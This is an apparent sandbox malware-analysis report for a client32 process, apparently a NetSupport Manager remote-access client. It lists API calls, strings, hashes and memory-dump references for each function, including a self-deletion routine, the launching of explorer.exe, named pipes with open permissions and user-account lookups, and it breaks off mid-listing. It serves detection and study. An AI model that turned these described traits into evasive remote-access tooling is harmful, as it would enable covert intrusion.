                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                  • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                                • UpdateWindow.USER32(?), ref: 11007EF2
                                                                                • SetCursor.USER32(?), ref: 11007EFF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                                • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 2635354838-2303488826
                                                                                • Opcode ID: ce91e015fccf874ab5364d5912c202136b1815022c7b0a0c5b798458fb00d7af
                                                                                • Instruction ID: 6182bcd3debcd054039c16ce38c58758ae1f5640e4e16b95df98d0b4ae7a1d43
                                                                                • Opcode Fuzzy Hash: ce91e015fccf874ab5364d5912c202136b1815022c7b0a0c5b798458fb00d7af
                                                                                • Instruction Fuzzy Hash: 5422C7B5A00719AFE714CFA4CC85FEAF7B8FB48708F0045A9E26A97684D774A940CF50
                                                                                Function 111273E0 Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 289fileprocessthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 11127400
                                                                                • _memset.LIBCMT ref: 1112741D
                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                                • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 11127455
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                                • _strrchr.LIBCMT ref: 111274AA
                                                                                • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111274E3
                                                                                • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112751C
                                                                                • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11127537
                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                                • wsprintfA.USER32 ref: 11127561
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112759E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275A7
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275AA
                                                                                • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
                                                                                • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                                • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127688
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                                • _strrchr.LIBCMT ref: 111276AB
                                                                                • _memmove.LIBCMT ref: 11127724
                                                                                • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                                • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                                • API String ID: 2219718054-800295887
                                                                                • Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                • Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
                                                                                • Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                • Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55
                                                                                Function 1102D9F4 Relevance: 37.0, APIs: 12, Strings: 9, Instructions: 278sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(000007D0,?,?,?,?,00000003), ref: 1102DAA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: *.*$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Finished terminate$HookDirectSound$Stop tracing, almost terminated$Unload Hook$pSlash
                                                                                • API String ID: 3472027048-4043340749
                                                                                • Opcode ID: abf5e97b96bc686d2a41011667bb67a811128fec0cddda19ba6729b313092461
                                                                                • Instruction ID: d56efc98ad72941ff424cdc5152fef311379b6c09b9f264f80b34d0be5964fb8
                                                                                • Opcode Fuzzy Hash: abf5e97b96bc686d2a41011667bb67a811128fec0cddda19ba6729b313092461
                                                                                • Instruction Fuzzy Hash: 3EA1F274E426269FEB06DFE0CCC4F6DB7A5AB8470CF6001B8E62657288D7716D84CB52
                                                                                Function 11147160 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 220libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11147195
                                                                                • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 111471C6
                                                                                • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 111471D4
                                                                                • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 111471E2
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 11147233
                                                                                • GetTickCount.KERNEL32 ref: 111472A0
                                                                                • GetTickCount.KERNEL32 ref: 111472C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                                • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                                • API String ID: 132346978-2450594007
                                                                                • Opcode ID: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                • Instruction ID: 7595ca438a49fe2cfed1e9b9138c1f844f941fc746b3e2b3d1353ee5cc6e5023
                                                                                • Opcode Fuzzy Hash: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                • Instruction Fuzzy Hash: 3F917A75A012289FDB28CF64C894ADAFBB4EF49318F5581E9E94D97301DB309E80CF91
                                                                                Function 111236E0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 329windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 11123836
                                                                                • FreeLibrary.KERNEL32(?,?,?), ref: 1112387B
                                                                                • IsIconic.USER32(?), ref: 111238C4
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 11123931
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Iconic$FreeInvalidateLibraryRect
                                                                                • String ID: KeepAspect$ScaleToFit$View$ignoring WM_TOUCH
                                                                                • API String ID: 2857465220-3401310001
                                                                                • Opcode ID: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                • Instruction ID: 49527fdfa53e08aa09f3a132f4721a51d3eab46a8aa9ea1429b3fa51c4cb3807
                                                                                • Opcode Fuzzy Hash: f2e6e33feaa6725b9faac7f171b1172a329f252e15d45d58948213b881d2ca94
                                                                                • Instruction Fuzzy Hash: 30C12771E1870A9FEB15CF64CA81BEAF7A4FB4C714FA0052EE916872C0E775A841CB51
                                                                                Function 110CB750 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 168windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowRect.USER32(00000000,?), ref: 110CB7D9
                                                                                • IsIconic.USER32(00000001), ref: 110CB7E9
                                                                                • GetClientRect.USER32(00000001,?), ref: 110CB7F8
                                                                                • GetSystemMetrics.USER32(00000000), ref: 110CB80D
                                                                                • GetSystemMetrics.USER32(00000001), ref: 110CB814
                                                                                • IsIconic.USER32(00000001), ref: 110CB844
                                                                                • GetWindowRect.USER32(00000001,?), ref: 110CB853
                                                                                • SetWindowPos.USER32(?,00000000,?,11186ABB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB907
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                • API String ID: 2655531791-1552842965
                                                                                • Opcode ID: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                                • Instruction ID: bec57f5bcccff08dda3657368f880f3a53371a65c549dad109d34ac0d6980115
                                                                                • Opcode Fuzzy Hash: 7316ed0ab011e425627eb5277c7b03534fcc1c44e65c4e20bf12da702932a4de
                                                                                • Instruction Fuzzy Hash: 3B51BE71E0061AAFDB10CFA5CC84FEEB7B8FB48754F1441A9E516A7280E774A905CF90
                                                                                Function 110F37A0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 79pipesleepmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F37AC
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F37D5
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F37E2
                                                                                • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3813
                                                                                • GetLastError.KERNEL32 ref: 110F3820
                                                                                • Sleep.KERNEL32(000003E8), ref: 110F383F
                                                                                • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F385E
                                                                                • LocalFree.KERNEL32(?), ref: 110F386F
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • CreateNamedPipe %s failed, error %d, xrefs: 110F3828
                                                                                • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F37C0
                                                                                • pSD, xrefs: 110F37C5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                                • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                                • API String ID: 3134831419-838605531
                                                                                • Opcode ID: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                                • Instruction ID: 0e8d2fcc7f1c5a3ddbef900f79df2a7d8f3873558929e31ad043a2fe9730b339
                                                                                • Opcode Fuzzy Hash: ba8c9a88e56743c1b68755e398c1e881422c14d751ccacaf3068d1f003b9bfe3
                                                                                • Instruction Fuzzy Hash: D721AA71E80329BBE7119BA4CC8AFEEB76CDB44729F004211FE356B1C0D6B05A058795
                                                                                Function 1115F840 Relevance: 18.0, APIs: 8, Strings: 2, Instructions: 459COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F886
                                                                                • RemovePropA.USER32(?), ref: 1115F8A5
                                                                                • RemovePropA.USER32(?), ref: 1115F8B4
                                                                                • RemovePropA.USER32(?,00000000), ref: 1115F8C3
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • CallWindowProcA.USER32(?,?,?,?,?), ref: 1115FC59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
                                                                                • String ID: ..\ctl32\wndclass.cpp$old_wndproc
                                                                                • API String ID: 1777853711-3305400014
                                                                                • Opcode ID: d15fbf1ee6f48fdfeb5a3f8b4ce6e4d3d5fcee809489cf716bc2b57072c05fa9
                                                                                • Instruction ID: 2a1ce18ce9ffe677ff7d10ad8131c1a7db68a641085b95e9de3494b6caebac20
                                                                                • Opcode Fuzzy Hash: d15fbf1ee6f48fdfeb5a3f8b4ce6e4d3d5fcee809489cf716bc2b57072c05fa9
                                                                                • Instruction Fuzzy Hash: 39D18E7530411A9BD748CE69E894EBBB3EAEBC9310B10466EFD56C3781DA31AC1187B1
                                                                                Function 110336D0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
